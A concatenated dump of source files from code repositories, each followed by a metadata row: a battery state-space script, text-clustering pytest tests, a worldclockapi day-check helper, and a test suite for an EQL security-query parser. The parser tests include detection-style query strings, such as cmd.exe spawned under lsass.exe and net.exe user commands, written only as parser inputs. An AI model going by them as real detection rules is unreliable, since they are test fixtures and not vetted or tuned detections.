print('-1/Rc/Cc=', -1/tau_ct, '-1/Rd/Cd=', -1/tau_dif)
print('1/Cc=', 1/c_ct, '1/Cd=', 1/c_dif)
print('r0=', r0)
a = np.array([[-1 / tau_ct, 0],
[0, -1 / tau_dif]])
b = np.array([[1 / c_ct, 0],
[1 / c_dif, 0]])
c = np.array([1., 1])
d = np.array([r0, 1])
return a, b, c, d
def main():
ss = StateSpace(2, 2, 1)
ss.A, ss.B, ss.C, ss.D = construct_state_space_monitor()
print('Monitor::')
print('A=', ss.A)
print('B=', ss.B)
print('C=', ss.C)
print('D=', ss.D)
ss.A, ss.B, ss.C, ss.D = construct_state_space_model()
print('Model::')
print('A=', ss.A)
print('B=', ss.B)
print('C=', ss.C)
print('D=', ss.D)
main()
| davegutz/myStateOfCharge | SOC_Particle/Battery State/EKF/sandbox/StateSpace.py | StateSpace.py | py | 4,669 | python | en | code | 1 | github-code | 13 |
11148196810 | from curses import raw
import pytest
from unittest.mock import Mock, patch
import json
import numpy as np
from copy import deepcopy
from uuid import uuid4
import tasks.cluster_texts as clusterer
from tasks.cluster_texts import KeywordItem
from tests.data.fixtures import (
CLUSTERED_DATA,
NESTED_DATA,
MULTI_NESTED_DATA,
MULTI_NESTED_DATA_W_CHILDREN_COUNT
)
class MyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.integer):
return int(obj)
elif isinstance(obj, np.floating):
return float(obj)
elif isinstance(obj, np.ndarray):
return obj.tolist()
else:
return super(MyEncoder, self).default(obj)
def get_test_embedding_data():
file_name = 'tests/data/raw_embedding_1000.json'
with open(file_name, 'r') as f:
lines = f.readlines()
lines = lines[:100]
for line in lines:
line = line.strip()
embedding_data = [json.loads(line) for line in lines]
return embedding_data
@pytest.fixture
def raw_embedding():
return get_test_embedding_data()
@pytest.fixture
def raw_embedding_w_seq_id():
embedding_data = get_test_embedding_data()
for item in embedding_data:
item['sequence_id'] = 'a_job_id_fixture'
return embedding_data
@pytest.fixture
def low_dim_embedding():
file_name = 'tests/data/low_dim_embedding.json'
with open(file_name, 'r') as f:
content = f.read()
return json.loads(content)
@pytest.fixture
def hierarchical_clustering():
file_name = 'tests/data/hierarchical_clustering.json'
with open(file_name) as f:
content = f.read()
return json.loads(content)
@pytest.fixture
def bfs_break_down():
file_name = 'tests/data/bfs_break_down.json'
with open(file_name) as f:
content = f.read()
return json.loads(content)
def test_reduce_dimension(raw_embedding):
ret_val = clusterer.reduce_dimension(raw_embedding)
assert len(ret_val) == len(raw_embedding)
for e in ret_val:
assert 'low_dim_embedding' in e
assert len(e['low_dim_embedding']) == 2
def test_cluster_data(low_dim_embedding):
clustered_data = clusterer.cluster_data(
low_dim_embedding,
coordinates_key='low_dim_embedding'
)
for item in clustered_data:
assert 'cluster_info' in item
assert 'is_cluster_head' in item['cluster_info']
assert 'cluster_label' in item['cluster_info']
def test_format_to_nested_clustering():
actual_result = clusterer.format_to_nested_clustering(
CLUSTERED_DATA
)
expected_result = NESTED_DATA
assert actual_result == expected_result
def test_cluster_hierarchically(
low_dim_embedding,
hierarchical_clustering
):
# massage data
for e in low_dim_embedding:
e['embedding'] = ''
# e['text'] = e['uuid'][:6]
actual_result = clusterer.cluster_hierarchically(
low_dim_embedding
)
# with open('tests/data/hierarchical_clustering.json', 'w') as f:
# f.write(json.dumps(
# actual_result,
# cls=MyEncoder,
# indent=4
# ))
expected_result = hierarchical_clustering
assert expected_result == actual_result
@pytest.mark.skip("BFS break down is deprecated for now")
def test_bfs_break_down(
hierarchical_clustering,
bfs_break_down
):
data = deepcopy({'children': hierarchical_clustering})
clusterer.bfs_break_down(data, max_cluster_size=5)
assert data == bfs_break_down
def test_insert_children_count():
expected_result = MULTI_NESTED_DATA_W_CHILDREN_COUNT
clusterer.insert_children_count(MULTI_NESTED_DATA)
actual_result = MULTI_NESTED_DATA
assert actual_result == expected_result
def test__group_keywords_by_count():
sample_data = [
KeywordItem(count=1, word='cables', relevance_score=0.39),
KeywordItem(count=1, word='cable', relevance_score=0.3),
KeywordItem(count=1, word='snapon', relevance_score=0.44),
KeywordItem(count=1, word='cable', relevance_score=0.23),
KeywordItem(count=1, word='cable', relevance_score=0.35),
KeywordItem(count=1, word='cable', relevance_score=0.35),
KeywordItem(count=1, word='copper', relevance_score=0.39),
KeywordItem(count=1, word='cable', relevance_score=0.43),
KeywordItem(count=1, word='cable', relevance_score=0.35),
KeywordItem(count=1, word='cable', relevance_score=0.43),
KeywordItem(count=1, word='cable', relevance_score=0.28),
KeywordItem(count=1, word='cabled', relevance_score=0.39),
]
expected_result = [
{'count': 8, 'keyword': 'cable', 'relevance_score': 2.72},
{'count': 1, 'keyword': 'snapon', 'relevance_score': 0.44},
{'count': 1, 'keyword': 'cables', 'relevance_score': 0.39},
{'count': 1, 'keyword': 'copper', 'relevance_score': 0.39},
{'count': 1, 'keyword': 'cabled', 'relevance_score': 0.39},
]
result = clusterer._group_keywords_by_count(sample_data)
assert (result[0].word, result[0].count, result[0].relevance_score) == ('cable', 8, 2.72)
@patch('tasks.cluster_texts._load_embeddings_from_db')
@patch('tasks.cluster_texts.TextModel')
def test_execute(mock_text_model, mock_embedding, raw_embedding_w_seq_id):
np.random.seed(1)
class MockTextModel:
def get_embedding_by_text(self, *args):
return list(np.random.randn(2))
sequence_id = 'test_sequence_id_' + str(uuid4())
# mock_text_model.get_embedding_by_text.return_value = list(rnd_vect)
mock_text_model.return_value = MockTextModel
cluster_texts = clusterer.ClusterTexts(kwargs={
"sequence_id": sequence_id,
})
mock_embedding.return_value = raw_embedding_w_seq_id
res = cluster_texts.execute()
# breakpoint()
| visda-app/service-mapping | tests/tasks/test_clusterer.py | test_clusterer.py | py | 5,866 | python | en | code | 0 | github-code | 13 |
1228993977 | import urllib.request, urllib.parse, urllib.error
import json
# Resets calls to 0 if worldclockapi indicates new day
def check(current, calls):
# Connect with worldclockapi
url = 'http://worldclockapi.com/api/json/est/now'
doc = urllib.request.urlopen(url)
data = doc.read().decode()
# Create JSON object with api data
try:
js = json.loads(data)
except:
js = None
# Reset calls to 0 if dayOfTheWeek does not match previous dayOfTheWeek
if js['dayOfTheWeek'] != current:
calls = 0
# Returns string corresponding to current dayOfTheWeek
def current():
# Connect with worldclockapi
url = 'http://worldclockapi.com/api/json/est/now'
doc = urllib.request.urlopen(url)
data = doc.read().decode()
# Create JSON object with api data
try:
js = json.loads(data)
except:
js = None
# Return current dayOfTheWeek
return js['dayOfTheWeek']
| aidenszeto/Dictionary-Bot | timer.py | timer.py | py | 940 | python | en | code | 2 | github-code | 13 |
39686495582 | """Test case."""
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
import sys
import traceback
import unittest
from eql import Schema
from eql.ast import * # noqa: F403
from eql.errors import EqlSchemaError, EqlSyntaxError, EqlSemanticError, EqlTypeMismatchError, EqlParseError
from eql.parser import (
allow_negation, allow_sample, allow_runs, parse_query, parse_expression, parse_definitions,
ignore_missing_functions, parse_field, parse_literal, extract_query_terms, keywords, elasticsearch_syntax,
elastic_endpoint_syntax, elasticsearch_validate_optional_fields
)
from eql.walkers import DepthFirstWalker
from eql.pipes import * # noqa: F403
class TestParser(unittest.TestCase):
"""Test EQL parsing."""
def test_valid_expressions(self):
"""Test that expressions are parsed correctly."""
valid = [
"1 == 1",
"false != (1 == 1)",
'abc != "ghi"',
"abc > 20",
"startsWith(abc, 'abc')",
"concat(a,b,c,d,)",
"a in (1,2,3,4,)",
"length(abc) < length(hij)",
"length(concat(abc))",
'abc == substring("abc", 1, 3)',
"1",
'(1)',
"true",
"false",
"null",
"not null",
"abc",
'"string"',
'abc and def',
'(1==abc) and def',
'1 * 2 + 3 * 4 + 10 / 2',
# opt-in with eql.parser.implied_booleans
# 'abc == (1 and 2)',
# 'abc == (def and 2)',
'abc == (def and def)',
'abc == (def and ghi)',
'"\\b\\t\\r\\n\\f\\\\\\"\\\'"',
'1 - -2',
'1 + -2',
'1 * (-2)',
'3 * -length(file_path)',
]
for query in valid:
parse_expression(query)
def test_parse_field(self):
"""Test that fields are parsed correctly."""
self.assertEqual(parse_field("process_name "), Field("process_name"))
self.assertEqual(parse_field("TRUE "), Field("TRUE"))
self.assertEqual(parse_field(" data[0]"), Field("data", [0]))
self.assertEqual(parse_field("data[0].nested.name"), Field("data", [0, "nested", "name"]))
self.assertRaises(EqlParseError, parse_field, " ")
self.assertRaises(EqlParseError, parse_field, "100.5")
self.assertRaises(EqlParseError, parse_field, "true")
self.assertRaises(EqlParseError, parse_field, "and")
self.assertRaises(EqlParseError, parse_field, "length(name) and path")
def test_parse_literal(self):
"""Test that fields are parsed correctly."""
self.assertEqual(parse_literal("true"), Boolean(True))
self.assertEqual(parse_literal("null"), Null())
self.assertEqual(parse_literal(" 100.5 "), Number(100.5))
self.assertEqual(parse_literal("true"), Boolean(True))
self.assertEqual(parse_literal("'C:\\\\windows\\\\system32\\\\cmd.exe'"),
String("C:\\windows\\system32\\cmd.exe"))
self.assertRaises(EqlParseError, parse_field, "and")
self.assertRaises(EqlParseError, parse_literal, "process_name")
self.assertRaises(EqlParseError, parse_literal, "length('abc')")
self.assertRaises(EqlParseError, parse_literal, "True")
def test_functions(self):
"""Test that functions are being parsed correctly."""
# Make sure that functions are parsing all arguments
with ignore_missing_functions:
fn = parse_expression('somefunction( a and c, false, d or g) ')
self.assertIsInstance(fn, FunctionCall)
self.assertEqual(len(fn.arguments), 3)
def test_invalid_expressions(self):
"""Test that expressions are parsed correctly."""
invalid = [
'', # empty
'a xor b', # made up comparator
'a ^ b', # made up comparator
'a b c d', # missing syntax
'def[]', # no index
'def[ghi]', # index not a number
'def[-1]', # negative indexes not supported
'someFunc().abc', # invalid function
'length().abc', # can't index these
'1.2.3', # invalid number
'a.1',
'(field', # unclosed paren
'(field xx', # unclosed paren and bad syntax
'field[', # unclosed bracket
'field[0', # unclosed bracket
'(',
')',
'()', # nothing inside
'',
'"invalid"string"',
'descendant of [event_type where true',
'--100',
'1000 100',
'"" 100',
# literal values as fields and functions
'true.100',
'true()',
'null.abc',
'abc[0].null',
# require escape slashes,
'\\R',
'\\W',
# minimum of 1 argument
'length()',
'concat()',
]
keywords = [
'and', 'by', 'in', 'join', 'macro', 'not', 'of', 'or', 'sequence', 'until', 'where', 'with'
]
for query in invalid:
self.assertRaises(EqlParseError, parse_expression, query)
for keyword in keywords:
self.assertRaises(EqlSyntaxError, parse_expression, keyword)
parse_expression(keyword.upper())
def test_valid_queries(self):
"""Make sure that EQL queries are properly parsed."""
valid = [
'file where true',
'file where true and true',
'file where false or true',
'registry where not pid',
'process where process_name == "net.exe" and command_line == "* user*.exe"',
'process where command_line == "~!@#$%^&*();\'[]{}\\\\|<>?,./:\\"-= \' "',
'process where \n\n\npid ==\t 4',
'process where process_name in ("net.exe", "cmd.exe", "at.exe")',
'process where command_line == "*.exe *admin*" or command_line == "* a b*"',
'process where pid in (1,2,3,4,5,6,7,8) and abc == 100 and def == 200 and ghi == 300 and jkl == x',
'process where ppid != pid',
'image_load where not x != y',
'image_load where not x == y',
'image_load where not not not not x < y',
'image_load where not x <= y',
'image_load where not x >= y',
'image_load where not x > y',
'process where _leadingUnderscore == 100',
'network where 1 * 2 + 3 * 4 + 10 / 2 == 2 + 12 + 5',
# now requires eql.parser.implied_booleans
# 'file where (1 - -2)',
# 'file where 1 + (-2)',
# 'file where 1 * (-2)',
# 'file where 3 * -length(file_path)',
'network where a * b + c * d + e / f == g + h + i',
'network where a * (b + c * d) + e / f == g + h + i',
'process where pid == 4 or pid == 5 or pid == 6 or pid == 7 or pid == 8',
'network where pid == 0 or pid == 4 or (ppid == 0 or ppid = 4) or (abc == defgh) and process_name == "*" ',
'network where pid = 4',
'process where descendant of [process where process_name == "lsass.exe"] and process_name == "cmd.exe"',
'join \t\t\t[process where process_name == "*"] [ file where file_path == "*"\n]',
'join by pid [process where name == "*"] [file where path == "*"] until [process where opcode == 2]',
'sequence [process where name == "*"] [file where path == "*"] until [process where opcode == 2]',
'sequence by pid [process where name == "*"] [file where path == "*"] until [process where opcode == 2]',
'join [process where process_name == "*"] by process_path [file where file_path == "*"] by image_path',
'sequence [process where process_name == "*"] by process_path [file where file_path == "*"] by image_path',
'sequence by pid [process where process_name == "*"] [file where file_path == "*"]',
'sequence by pid with maxspan=200ms [process where process_name == "*" ] [file where file_path == "*"]',
'sequence by pid with maxspan=1s [process where process_name == "*" ] [file where file_path == "*"]',
'sequence by pid with maxspan=2h [process where process_name == "*"] [file where file_path == "*"]',
'sequence by pid with maxspan=3d [process where process_name == "*"] [file where file_path == "*"]',
'dns where pid == 100 | head 100 | tail 50 | unique pid',
'network where pid == 100 | unique command_line | count',
'security where user_domain == "endgame" | count user_name a b | tail 5',
'process where 1==1 | count user_name, unique_pid, concat(field2,a,bc)',
'process where 1==1 | unique user_name, concat(field2,a,bc), field2',
'registry where a.b',
'registry where a[0]',
'registry where a.b.c.d.e',
'registry where a.b.c[0]',
'registry where a[0].b',
'registry where a[0][1].b',
'registry where a[0].b[1]',
'registry where topField.subField[100].subsubField == 0',
'process where true | filter true',
'process where 1==1 | filter abc == def',
'process where 1==1 | filter abc == def and 1 != 2',
'process where 1==1 | count process_name | filter percent > 0.5',
'process where a > 100000000000000000000000000000000',
'any where true | unique a b c | sort a b c | count',
'any where true | unique a, b, c | sort a b c | count',
'any where true | unique a, b, c | sort a,b,c | count',
'file where child of [registry where true]',
'file where event of [registry where true]',
'file where event of [registry where true]',
'file where descendant of [registry where true]',
# multiple by values
'sequence by field1 [file where true] by f1 [process where true] by f1',
'sequence by a,b,c,d [file where true] by f1,f2 [process where true] by f1,f2',
'sequence [file where 1=1] by f1,f2 [process where 1=1] by f1,f2 until [process where 1=1] by f1,f2',
'sequence by f [file where true] by a,b [process where true] by c,d until [process where 1=1] by e,f',
# sequence with named params
'sequence by unique_pid [process where true] [file where true] fork',
'sequence by unique_pid [process where true] [file where true] fork=true',
'sequence by unique_pid [process where true] [file where true] fork=false',
]
datetime.datetime.now()
for i, text in enumerate(valid):
try:
query = parse_query(text)
rendered = query.render()
self.assertEqual(text.split()[0], rendered.split()[0])
# parse it again to make sure it's still valid and doesn't change
parse_again = parse_query(rendered)
rendered_again = parse_again.render()
# repr + eval should also restore it properly
# Test that eval + repr works
actual_repr = repr(query)
eval_actual = eval(actual_repr)
self.assertEqual(query, parse_again, "Query didn't reparse correctly.")
self.assertEqual(rendered, rendered_again)
self.assertEqual(query, eval_actual)
except (EqlSyntaxError, EqlSemanticError):
ex_type, ex, tb = sys.exc_info()
traceback.print_exc()
traceback.print_tb(tb)
self.fail("Unable to parse query #{}: {}".format(i, text))
def test_invalid_queries(self):
"""Test that invalid queries throw the proper error."""
invalid = [
'', # empty
'process where process_name == "abc.exe" garbage extraneous \"input\"',
'garbage process where process_name < "abc.e"xe"',
'process',
'process where abc == "extra"quote"',
'file where and',
'file where file_name and',
'file_name and',
'file_name )',
'file_name (\r\n\r\n',
'file_name where (\r\n\r\n)',
'process where 1field == 2field',
'sequence where 1field == 2field',
'process where true | filter',
'process where true | badPipe',
'process where true | badPipe a b c',
'process where true | head -100',
'process where descendant of []',
'file where nothing of [process where true]',
'file where DescenDant of [process where true]',
'garbage',
'process where process_name == "abc.exe" | count 100',
'process where process_name == "abc.exe" | unique 100',
'process where process_name == "abc.exe" | sort 100',
'process where process_name == "abc.exe" | head 100 abc',
'process where process_name == "abc.exe" | head abc',
'process where process_name == "abc.exe" | head abc()',
'process where process_name == "abc.exe" | head abc(def, ghi)',
'sequence [process where pid == pid]',
'sequence [process where pid == pid] []',
'sequence with maxspan=false [process where true] [process where true]',
'sequence with badparam=100 [process where true] [process where true]',
'sequence [process where opcode == 1] by unique_pid [file where opcode == 0] by unique_pid with runs=2',
# check that the same number of BYs are in every subquery
'sequence with runs=2 [file where opcode == 0] [file where opcode == 0]',
'sequence [file where true] [process where true] until [network where true] with runs=2',
'join [file where opcode == 0] [file where opcode == 0] with runs=1',
'sequence [file where true] [process where true] by field1',
'sequence [file where true] by field [file where true] by field1 until [file where true]',
'sequence by a,b,c [file where true] by field [file where true] by field1 until [file where true]',
'sequence [file where 1] by field [file where 1] by f1 until [file where 1] by f1,f2 | unique field',
'sequence [process where 1] fork=true [network where 1]',
'sequence [process where 1] [network where 1] badparam=true',
'sequence [process where 1] [network where 1] fork=true fork=true',
'sequence [process where 1] [network where 1] fork fork',
'process where descendant of [file where true] bad=param',
'| filter true'
# forks updated to stictly take true/false (true if not defined)
'sequence by unique_pid [process where true] [file where true] fork=1',
'sequence by unique_pid [process where true] [file where true] fork=0 [network where true]',
'sequence by unique_pid [process where true] [file where true] fork=0',
# time units made stricter, and floating points removed
'sequence by pid with maxspan=2sec [process where process_name == "*" ] [file where file_path == "*"]',
'sequence by pid with maxspan=200 [process where process_name == "*" ] [file where file_path == "*"]',
'sequence by pid with maxspan=2seconds [process where process_name == "*" ] [file where file_path == "*"]',
'sequence with maxspan=2.5m [process where x == x] by pid [file where file_path == "*"] by ppid',
'sequence by pid with maxspan=2.0h [process where process_name == "*"] [file where file_path == "*"]',
'sequence by pid with maxspan=2.0h [process where process_name == "*"] [file where file_path == "*"]',
'sequence by pid with maxspan=1.0075d [process where process_name == "*"] [file where file_path == "*"]',
# bad sequence alias, without endpoint syntax
'sequence [process where process.name == "cmd.exe"] as a0 [network where a0.process.id == process.id]'
# sequence with negative missing events without maxspan
'sequence [process where true] ![file where true]',
# sequence with negative missing events without elasticsearch flag
'sequence with maxspan [process where true] ![file where true]',
]
for query in invalid:
self.assertRaises(EqlParseError, parse_query, query)
def test_backtick_fields(self):
"""Test that backticks are accepted with fields."""
def parse_to(text, path):
node = parse_expression(text)
self.assertIsInstance(node, Field)
self.assertEqual(node.full_path, path)
# now render back as text and parse again
node2 = parse_expression(node.render())
self.assertEqual(node2, node)
parse_to("`foo-bar-baz`", ["foo-bar-baz"])
parse_to("`foo bar baz`", ["foo bar baz"])
parse_to("`foo.bar.baz`", ["foo.bar.baz"])
parse_to("`foo`.`bar-baz`", ["foo", "bar-baz"])
parse_to("`foo.bar-baz`", ["foo.bar-baz"])
parse_to("`💩`", ["💩"])
parse_to("`foo`[0]", ["foo", 0])
parse_to("`foo`[0].`bar`", ["foo", 0, "bar"])
# keywords
for keyword in keywords:
parse_to("`{keyword}`".format(keyword=keyword), [keyword])
parse_to("prefix.`{keyword}`".format(keyword=keyword), ["prefix", keyword])
parse_to("`{keyword}`[0].suffix".format(keyword=keyword), [keyword, 0, "suffix"])
def test_backtick_split_lines(self):
"""Confirm that backticks can't be split across lines."""
with self.assertRaises(EqlSyntaxError):
parse_expression("`abc \n def`")
def test_query_events(self):
"""Test that event queries work with events[n].* syntax in pipes."""
base_queries = ['abc', 'abc[123]', 'abc.def.ghi', 'abc.def[123].ghi[456]']
for text in base_queries:
field_query = parse_expression(text) # type: Field
events_query = parse_expression('events[0].' + text) # type: Field
index, query = field_query.query_multiple_events()
self.assertEqual(index, 0, "Didn't query from first event")
self.assertEqual(query, field_query, "Didn't unconvert query")
index, query = events_query.query_multiple_events()
self.assertEqual(index, 0, "Didn't query from first event")
self.assertEqual(query, field_query, "Didn't unconvert query")
for event_index, text in enumerate(base_queries):
events_text = 'events[{}].{}'.format(event_index, text)
field_query = parse_expression(text) # type: Field
events_query = parse_expression(events_text) # type: Field
index, query = events_query.query_multiple_events()
self.assertEqual(index, event_index, "Didn't query from {} event".format(event_index))
self.assertEqual(query, field_query, "Didn't unconvert query")
def test_comments(self):
"""Test that comments are valid syntax but stripped from AST."""
match = parse_query("process where pid=4 and ppid=0")
query = parse_query("""process where pid = 4 /* multi\nline\ncomment */ and ppid=0""")
self.assertEqual(match, query)
query = parse_query("""process where pid = 4 // something \n and ppid=0""")
self.assertEqual(match, query)
query = parse_query("""process where pid
= 4 and ppid=0
""")
self.assertEqual(match, query)
query = parse_query("""process where
// test
//
//line
//comments
pid = 4 and ppid = 0
""")
self.assertEqual(match, query)
match = parse_expression("true")
query = parse_expression("true // something else \r\n /* test\r\n something \r\n*/")
self.assertEqual(match, query)
commented = parse_definitions("macro test() pid = 4 and /* comment */ ppid = 0")
macro = parse_definitions("macro test() pid = 4 and ppid = 0")
self.assertEqual(commented, macro)
def test_float_time_unit(self):
"""Test that error messages are raised and formatted when time units are missing."""
def error(query, message):
with self.assertRaises(EqlSemanticError) as exc:
parse_query(query)
self.assertEqual(exc.exception.error_msg, message)
error("sequence with maxspan=0.150s [foo where true] [bar where true]",
"Only integer values allowed for maxspan. Did you mean 150ms?")
error("sequence with maxspan=1.6h [foo where true] [bar where true]",
"Only integer values allowed for maxspan.\nTry a more precise time unit: ms, s, m.")
error("sequence with maxspan=0.5ms [foo where true] [bar where true]",
"Only integer values allowed for maxspan.")
error("sequence with maxspan=0.5zz [foo where true] [bar where true]",
"Only integer values allowed for maxspan.")
def test_invalid_comments(self):
"""Test that invalid/overlapping comments fail."""
query_text = "process where /* something */ else */ true"
self.assertRaises(EqlParseError, parse_query, query_text)
# Test nested comments (not supported)
query_text = "process where /* outer /* nested */ outer */ true"
self.assertRaises(EqlParseError, parse_query, query_text)
query_text = "process where // true"
self.assertRaises(EqlParseError, parse_query, query_text)
def test_invalid_time_unit(self):
"""Test that error messages are raised and formatted when time units are missing."""
with self.assertRaisesRegex(EqlSemanticError, "Unknown time unit. Recognized units are: ms, s, m, h, d."):
parse_query("sequence with maxspan=150 zz [foo where true] [bar where true]")
with self.assertRaisesRegex(EqlSemanticError, "Unknown time unit. Recognized units are: ms, s, m, h, d."):
parse_query("sequence with maxspan=150 hours [foo where true] [bar where true]")
def test_method_syntax(self):
"""Test correct parsing and rendering of methods."""
parse1 = parse_expression("(a and b):concat():length()")
parse2 = parse_expression("a and b:concat():length() > 0")
self.assertNotEqual(parse1, parse2)
class Unmethodize(DepthFirstWalker):
"""Strip out the method metadata, so its rendered directly as a node."""
def _walk_function_call(self, node):
node.as_method = False
return node
without_method = Unmethodize().walk(parse1)
expected = parse_expression("length(concat(a and b))")
self.assertEqual(parse1, parse_expression("(a and b):concat():length()"))
self.assertIsNot(parse1, without_method)
self.assertEqual(without_method, expected)
def test_missing_time_unit(self):
"""Test that error messages are raised and formatted when time units are missing."""
with self.assertRaisesRegex(EqlSemanticError, "Missing time unit. Did you mean 150s?"):
parse_query("sequence with maxspan=150 [foo where true] [bar where true]")
def test_term_extraction(self):
"""Test that EQL terms are correctly extracted."""
process_event = """
process where process_name == "net.exe" and child of [
network where destination_port == 443
]
"""
file_event = "file where false"
network_event = " network where\n\n\n\n destination_address='1.2.3.4'\n\t and destination_port == 8443"
sequence_template = "sequence with maxspan=10m [{}] by field1, field2, [{}] by field2, field3 [{}] by f4, f5"
join_template = "join [{}] by a [{}] by b [{}] by c until [dns where false] by d"
# basic sequence with by
terms = [process_event, network_event, file_event]
stripped = [t.strip() for t in terms]
sequence_extracted = extract_query_terms(sequence_template.format(*terms))
self.assertListEqual(sequence_extracted, stripped)
# sequence with by and pipes
terms = [network_event, process_event, process_event]
stripped = [t.strip() for t in terms]
sequence_extracted = extract_query_terms(sequence_template.format(*terms) + "| head 100 | tail 10")
self.assertListEqual(sequence_extracted, stripped)
# join with by
terms = [network_event, process_event, process_event]
stripped = [t.strip() for t in terms]
join_extracted = extract_query_terms(join_template.format(*terms))
self.assertListEqual(join_extracted, stripped)
# simple query without pipes
simple_extracted = extract_query_terms(network_event)
self.assertListEqual(simple_extracted, [network_event.strip()])
# simple query with pipes
simple_extracted = extract_query_terms(network_event + "| unique process_name, user_name\n\n| tail 10")
self.assertListEqual(simple_extracted, [network_event.strip()])
def test_unicode_escape(self):
"""Confirm that u{...} escapes are interpreted properly."""
self.assertEqual(String("just A here"), parse_expression('"just \\u{41} here"'))
self.assertEqual(String("just A here"), parse_expression('"just \\u{041} here"'))
self.assertEqual(String("just A here"), parse_expression('"just \\u{0041} here"'))
self.assertEqual(String("just \u0407 here"), parse_expression('"just \\u{407} here"'))
self.assertEqual(String("just \U0001F4A9 here"), parse_expression('"just \\u{1F4A9} here"'))
self.assertEqual(String("just \U0001F4A9 here"), parse_expression('"just \\u{001F4A9} here"'))
with self.assertRaises(EqlParseError):
parse_expression('"just \\u{0} here"')
parse_expression('"just \\u{1} here"')
parse_expression('"just \\u{0000001F4A9} here"')
def test_elasticsearch_flag(self):
"""Check that removed Endgame syntax throws an error and new syntax does not."""
schema = Schema({
"process": {
"process_name": "string",
"pid": "number",
"string_array": ["string"],
"obj_array": [{"trusted": "boolean"}],
"opcode": "number",
"process": {"name": "string"},
"unique_pid": "string",
"user": {"name": "string"},
"field1": {"nested_field": "string", "nested_field2": "string"},
},
"file": {
"opcode": "number",
"unique_pid": "string"
},
"network": {
"process": {"name": "string"},
"user": {"name": "string"}
}
})
with elasticsearch_syntax, allow_runs:
subquery1 = '[process where opcode == 1] by unique_pid'
runs = [2, 10, 30]
for run in runs:
subquery2_runs = '[file where opcode == 0] by unique_pid with runs={}'.format(run)
parse_query('sequence {} {}'.format(subquery1, subquery2_runs))
self.assertRaises(EqlSyntaxError, parse_query,
'sequence [file where true] by field until [file where true] with runs=2')
self.assertRaises(EqlSemanticError, parse_query, 'sequence [process where opcode == 1] with runs=0')
self.assertRaises(EqlSyntaxError, parse_query, 'sequence [process where opcode == 1] with runs=-1')
self.assertRaises(EqlSemanticError, parse_query, 'sequence [process where opcode == 1] with runs=1')
# ensure runs feature is building subqueries correctly (even on first subquery)
ast = parse_query('sequence [process where process.name != null] with runs=3')
self.assertEqual(len(ast.first.queries), 3)
ast = parse_query('sequence [process where process.name != null]')
self.assertEqual(len(ast.first.queries), 1)
with elasticsearch_syntax, schema:
parse_query('process where process_name : "cmd.exe"')
parse_query('process where process_name : """cmd.exe"""')
parse_query('process where process_name : """""cmd.exe"""""')
parse_query('process where process_name : ("cmd*.exe", "foo*.exe")')
parse_query('process where process_name : ("cmd*.exe", """foo*.exe""")')
parse_query('process where process_name in~ ("cmd.exe", """foo.exe""")')
parse_query('process where process_name in ("cmd.exe", """foo.exe""")')
parse_query('process where process_name like ("cmd*.exe", """foo*.exe""")')
parse_query('process where process_name like~ ("cmd*.exe", """foo*.exe""")')
parse_query('process where process_name regex ("cmd*.exe", """foo*.exe""")')
parse_query('process where process_name regex~ ("""cmd.*\\.exe""", """foo.*\\.exe""")')
parse_query("process where startsWith(process_name, \"cmd.exe\")")
parse_query("process where startsWith~(process_name, \"cmd.exe\")")
self.assertRaises(EqlSyntaxError, parse_query, "process where $variable")
self.assertRaises(EqlSyntaxError, parse_query,
'process where _arraysearch(process.args, $variable, $variable == "foo"')
# invalid syntax, because the right side should be a string literal or list of literals
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name : length()")
self.assertRaises(EqlSemanticError, parse_query, "process where pid : 1")
self.assertRaises(EqlSemanticError, parse_query, "process where pid like 1")
self.assertRaises(EqlSemanticError, parse_query, "process where pid regex 1")
self.assertRaises(EqlSemanticError, parse_query, "process where pid like~ 1")
self.assertRaises(EqlSemanticError, parse_query, "process where pid regex~ 1")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name = \"cmd.exe\"")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name == 'cmd.exe'")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name == ?'cmd.exe'")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name == ?\"cmd.exe\"")
# optional fields in the schema
parse_query('process where ?process.name : "cmd.exe"')
parse_query('process where ?process_name : "cmd.exe"')
# optional fields not in the schema
parse_query('process where ?unknown_field : "cmd.exe"')
parse_query('process where ?unknown.field : "cmd.exe"')
with elasticsearch_validate_optional_fields:
self.assertRaises(EqlSemanticError, parse_query, 'process where ?unknown_field : "cmd.exe"')
self.assertRaises(EqlSemanticError, parse_query, 'process where ?unknown.field : "cmd.exe"')
# optional fields in the schema
parse_query('process where ?process.name : "cmd.exe"')
parse_query('process where ?process_name : "cmd.exe"')
# sample base query usage
with allow_sample:
parse_query('sample by user [process where opcode == 1] [process where opcode == 1]')
# invalid sample base query usage
self.assertRaises(EqlSemanticError, parse_query,
'sample by user [process where opcode == 1] [process where opcode == 1]')
self.assertRaises(EqlSemanticError, parse_query,
'sample by user [process where opcode == 1] ![process where opcode == 1]')
with elasticsearch_syntax, allow_negation:
parse_query('sequence with maxspan=2s [process where true] ![file where true]')
parse_query('sequence with maxspan=2s ![process where true] [file where true]')
parse_query('sequence with maxspan=2s [process where true] ![file where true] [file where true]')
self.assertRaises(EqlSemanticError, parse_query,
'sequence [process where true] [file where true] ![file where true]')
self.assertRaises(EqlSemanticError, parse_query,
'join ![process where true] [file where true] [file where true]')
self.assertRaises(EqlSemanticError, parse_query,
'sample ![process where true] [file where true] [file where true]')
with schema:
parse_query("process where process_name == 'cmd.exe'")
parse_query("process where process_name == ?'cmd.exe'")
parse_query("process where process_name == ?\"cmd.exe\"")
parse_query("process where startsWith(process_name, \"cmd.exe\")")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name : length()")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name like length()")
self.assertRaises(EqlSyntaxError, parse_query, 'process where process_name == """cmd.exe"""')
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name : \"cmd.exe\"")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name : (\"cmd.exe\")")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name : length()")
self.assertRaises(EqlSyntaxError, parse_query, 'process where process_name == """cmd.exe"""')
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name in~ (\"cmd.exe\")")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name like \"cmd.exe\"")
self.assertRaises(EqlSyntaxError, parse_query, "process where process_name like (\"cmd.exe\")")
